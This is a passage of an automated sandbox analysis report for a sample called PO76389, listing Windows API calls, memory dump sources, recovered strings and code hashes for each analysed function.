                                                    • FindClose.KERNEL32(00000000), ref: 00502191
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                    • String ID: *.*
                                                    • API String ID: 1803514871-438819550
                                                    • Opcode ID: 6155f5801085814281c92988d69fade6612bdfa6c37892d2075e69138bfe7e39
                                                    • Instruction ID: 171b1847203f02c25120fb248f1d9bd8340370f64b8495d522d9fb3bb71898c1
                                                    • Opcode Fuzzy Hash: 6155f5801085814281c92988d69fade6612bdfa6c37892d2075e69138bfe7e39
                                                    • Instruction Fuzzy Hash: 2731A2316002196BCB20ABB4EC5CADE7BBCAF15324F104166F911E31D0DB74DA88DA74
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • DragQueryPoint.SHELL32(?,?), ref: 0051F14B
                                                      • Part of subcall function 0051D5EE: ClientToScreen.USER32(?,?), ref: 0051D617
                                                      • Part of subcall function 0051D5EE: GetWindowRect.USER32(?,?), ref: 0051D68D
                                                      • Part of subcall function 0051D5EE: PtInRect.USER32(?,?,0051EB2C), ref: 0051D69D
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0051F1B4
                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0051F1BF
                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0051F1E2
                                                    • _wcscat.LIBCMT ref: 0051F212
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0051F229
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0051F242
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0051F259
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0051F27B
                                                    • DragFinish.SHELL32(?), ref: 0051F282
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0051F36D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                    • API String ID: 2166380349-3440237614
                                                    • Opcode ID: dd59564d9e73b95c65c376d70f9ffc9bda5bff6346b579e8ac865bce523815a9
                                                    • Instruction ID: 06427f60a374b93390363bd45c740551d0bebf492699ce5f1ac53fa9394c8e65
                                                    • Opcode Fuzzy Hash: dd59564d9e73b95c65c376d70f9ffc9bda5bff6346b579e8ac865bce523815a9
                                                    • Instruction Fuzzy Hash: B9616A71008301AFD700EF64DC85E9BBBF8BF89714F000A2EF595932A1DB709A49DB66
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 005021C0
                                                    • _wcscmp.LIBCMT ref: 005021D5
                                                    • _wcscmp.LIBCMT ref: 005021EC
                                                      • Part of subcall function 004F7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004F7621
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0050221B
                                                    • FindClose.KERNEL32(00000000), ref: 00502226
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00502242
                                                    • _wcscmp.LIBCMT ref: 00502269
                                                    • _wcscmp.LIBCMT ref: 00502280
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00502292
                                                    • SetCurrentDirectoryW.KERNEL32(00563A68), ref: 005022B0
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 005022BA
                                                    • FindClose.KERNEL32(00000000), ref: 005022C7
                                                    • FindClose.KERNEL32(00000000), ref: 005022D7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 1824444939-438819550
                                                    • Opcode ID: b955e2c3d6d54723b234f32159998a2f825561339f4960868027c4a5b9077362
                                                    • Instruction ID: 4ae0049de6c5c34e2ac06164a43849b07abb8408e5704e9d07212e22ef4c7a6c
                                                    • Opcode Fuzzy Hash: b955e2c3d6d54723b234f32159998a2f825561339f4960868027c4a5b9077362
                                                    • Instruction Fuzzy Hash: ED31B23560121A6ACB20EBE4EC4CEDE7BBCAF55324F1405A6E814A21D0DB749E89DA64
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memmove_memset
                                                    • String ID: Q\E$[$\$\$\$]$^
                                                    • API String ID: 3555123492-286096704
                                                    • Opcode ID: 3d16cb89f5f63364d05aa0c0d4de51f2fbfa33be6ddd19584fff7febabc0fe0d
                                                    • Instruction ID: ed005b545b4f1ffa594f51b47d98938b88e0a7fbb861afc7b562bf855febcdc1
                                                    • Opcode Fuzzy Hash: 3d16cb89f5f63364d05aa0c0d4de51f2fbfa33be6ddd19584fff7febabc0fe0d
                                                    • Instruction Fuzzy Hash: 1F72B071D04219CBDF24CF98C8906EDBBB1FF44314F2581AAD855AB381D738AE81DB65
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0051ED0C
                                                    • GetFocus.USER32 ref: 0051ED1C
                                                    • GetDlgCtrlID.USER32(00000000), ref: 0051ED27
                                                    • _memset.LIBCMT ref: 0051EE52
                                                    • GetMenuItemInfoW.USER32 ref: 0051EE7D
                                                    • GetMenuItemCount.USER32(00000000), ref: 0051EE9D
                                                    • GetMenuItemID.USER32(?,00000000), ref: 0051EEB0
                                                    • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0051EEE4
                                                    • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0051EF2C
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0051EF64
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0051EF99
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                    • String ID: 0
                                                    • API String ID: 3616455698-4108050209
                                                    • Opcode ID: ee3f84785972f76a135eef15b704a4fbeb8de5f0ad7b52ecdc75a96473636e41
                                                    • Instruction ID: fc0c89bb79763194f44f03b9075f4fec71f3e5c450f0f9ab50927dedab0653a5
                                                    • Opcode Fuzzy Hash: ee3f84785972f76a135eef15b704a4fbeb8de5f0ad7b52ecdc75a96473636e41
                                                    • Instruction Fuzzy Hash: A6818D71108301AFEB10DF14D886AABBFE8FB88354F04492DFD9997291D730D985DBA2
                                                    APIs
                                                      • Part of subcall function 004EB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004EB903
                                                      • Part of subcall function 004EB8E7: GetLastError.KERNEL32(?,004EB3CB,?,?,?), ref: 004EB90D
                                                      • Part of subcall function 004EB8E7: GetProcessHeap.KERNEL32(00000008,?,?,004EB3CB,?,?,?), ref: 004EB91C
                                                      • Part of subcall function 004EB8E7: RtlAllocateHeap.NTDLL(00000000,?,004EB3CB), ref: 004EB923
                                                      • Part of subcall function 004EB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004EB93A
                                                      • Part of subcall function 004EB982: GetProcessHeap.KERNEL32(00000008,004EB3E1,00000000,00000000,?,004EB3E1,?), ref: 004EB98E
                                                      • Part of subcall function 004EB982: RtlAllocateHeap.NTDLL(00000000,?,004EB3E1), ref: 004EB995
                                                      • Part of subcall function 004EB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004EB3E1,?), ref: 004EB9A6
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004EB3FC
                                                    • _memset.LIBCMT ref: 004EB411
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004EB430
                                                    • GetLengthSid.ADVAPI32(?), ref: 004EB441
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 004EB47E
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004EB49A
                                                    • GetLengthSid.ADVAPI32(?), ref: 004EB4B7
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004EB4C6
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 004EB4CD
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004EB4EE
                                                    • CopySid.ADVAPI32(00000000), ref: 004EB4F5
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004EB526
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004EB54C
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004EB560
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 2347767575-0
                                                    • Opcode ID: 65bfcef0f7a0ed3ae48d5ce2520b4cee7561f8365fffb2e076a4f60028786a69
                                                    • Instruction ID: 8b549389e37f23c3cc4a22edb636603959bf5fa4ae6ee765b1f8b22b39ab6603
                                                    • Opcode Fuzzy Hash: 65bfcef0f7a0ed3ae48d5ce2520b4cee7561f8365fffb2e076a4f60028786a69
                                                    • Instruction Fuzzy Hash: A8515A71900249ABCF04DFA2DC48AEFBB79FF04745F04811AF911A63A1DB389A05DFA4
                                                    APIs
                                                      • Part of subcall function 004B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004B31DA
                                                      • Part of subcall function 004F7C0C: GetFileAttributesW.KERNEL32(?,004F6A7B), ref: 004F7C0D
                                                    • _wcscat.LIBCMT ref: 004F6E7E
                                                    • __wsplitpath.LIBCMT ref: 004F6E99
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004F6EAE
                                                    • _wcscpy.LIBCMT ref: 004F6EDD
                                                    • _wcscat.LIBCMT ref: 004F6EEF
                                                    • _wcscat.LIBCMT ref: 004F6F01
                                                    • DeleteFileW.KERNEL32(?), ref: 004F6F0E
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004F6F22
                                                    • FindClose.KERNEL32(00000000), ref: 004F6F3D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                    • String ID: \*.*
                                                    • API String ID: 2643075503-1173974218
                                                    • Opcode ID: ee945507a9565c7d54c2551b144d28dfaacd6a4c9dbe8c897b64a7df8d78fae4
                                                    • Instruction ID: a9480b40b2ff53407d09b405030a9c62f375ea2da9ca7b4f316bdd9d96c2a353
                                                    • Opcode Fuzzy Hash: ee945507a9565c7d54c2551b144d28dfaacd6a4c9dbe8c897b64a7df8d78fae4
                                                    • Instruction Fuzzy Hash: 0F21C5B2408348AAC310EBA4D8559EBBBEC9F59214F044E5FF5D4C3252EA38D64DC776
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                    • API String ID: 0-2893523900
                                                    • Opcode ID: 8e84dbbd1d0b22ee716732181b09ae14577c874c64712c1204f903254f96b906
                                                    • Instruction ID: 32adf74dce9c4d6c377b61d7eccbf0dcdb84ed04bbeab6bb3dd822ef06177ae3
                                                    • Opcode Fuzzy Hash: 8e84dbbd1d0b22ee716732181b09ae14577c874c64712c1204f903254f96b906
                                                    • Instruction Fuzzy Hash: 4A6281B1E002199BDF14DF99C8817EEBBB5BF48310F15816BE845EB281D7789E41CBA4
                                                    APIs
                                                      • Part of subcall function 00513AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0051317F
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0051321E
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 005132B6
                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 005134F5
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00513502
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1240663315-0
                                                    • Opcode ID: a04f14a089b60364445456188641c83859b620a956036b9414354e61aabc2b30
                                                    • Instruction ID: a21cc54dc9580a6236b317e3c15ecaa88f03c3daf5b86fe4e4bed89c41f79a21
                                                    • Opcode Fuzzy Hash: a04f14a089b60364445456188641c83859b620a956036b9414354e61aabc2b30
                                                    • Instruction Fuzzy Hash: 82E16B35204200AFDB14DF25C894E6ABBF9FF88724B04896EF44ADB261DB35ED45CB51
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    • Opcode ID: aec96f673c3c12a4e0d1e8ed3b803afff563926f6afba5df65befdc3ecd2b7d6
                                                    • Instruction ID: 2c36732fa29d0fa9b5e308d2037fa2be436ce9630509fbf382438264bdcaeac8
                                                    • Opcode Fuzzy Hash: aec96f673c3c12a4e0d1e8ed3b803afff563926f6afba5df65befdc3ecd2b7d6
                                                    • Instruction Fuzzy Hash: DF21F635600115AFD7106F25EC1AB6E7BB8FF14710F00801AF9098B3A1DB78ED04EBA8
                                                    APIs
                                                      • Part of subcall function 004EA857: CLSIDFromProgID.COMBASE ref: 004EA874
                                                      • Part of subcall function 004EA857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 004EA88F
                                                      • Part of subcall function 004EA857: lstrcmpiW.KERNEL32(?,00000000), ref: 004EA89D
                                                      • Part of subcall function 004EA857: CoTaskMemFree.COMBASE(00000000), ref: 004EA8AD
                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0050C6AD
                                                    • _memset.LIBCMT ref: 0050C6BA
                                                    • _memset.LIBCMT ref: 0050C7D8
                                                    • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 0050C804
                                                    • CoTaskMemFree.COMBASE(?), ref: 0050C80F
                                                    Strings
                                                    • NULL Pointer assignment, xrefs: 0050C85D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                    • String ID: NULL Pointer assignment
                                                    • API String ID: 1300414916-2785691316
                                                    • Opcode ID: e75cee8e944e34e70a9b96c083f65e59623366f307c53c05b3efbdc039161862
                                                    • Instruction ID: a0d5535c139221a472084471972c21361eeadbb1e0009f097498e3478a6244fc
                                                    • Opcode Fuzzy Hash: e75cee8e944e34e70a9b96c083f65e59623366f307c53c05b3efbdc039161862
                                                    • Instruction Fuzzy Hash: 0C914771D00218ABDB10DFA5DC81ADEBFB9FF09710F20815AF519A7291EB705A44CFA4
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 005024F6
                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00502526
                                                    • _wcscmp.LIBCMT ref: 0050253A
                                                    • _wcscmp.LIBCMT ref: 00502555
                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 005025F3
                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00502609
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                    • String ID: *.*
                                                    • API String ID: 713712311-438819550
                                                    • Opcode ID: 54813a600176d830bfffc1f8abf35dca3d380bd9a389213cb51a97fea23f789e
                                                    • Instruction ID: 3176e5940e2baa78d0bb91693c141bd539502a672bb83c93fba39b0591d97afb
                                                    • Opcode Fuzzy Hash: 54813a600176d830bfffc1f8abf35dca3d380bd9a389213cb51a97fea23f789e
                                                    • Instruction Fuzzy Hash: 31418D7190021AAFCF14DFA5CC99AEEBFB4FF15304F10045AE815A62D0EB359A84DFA4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
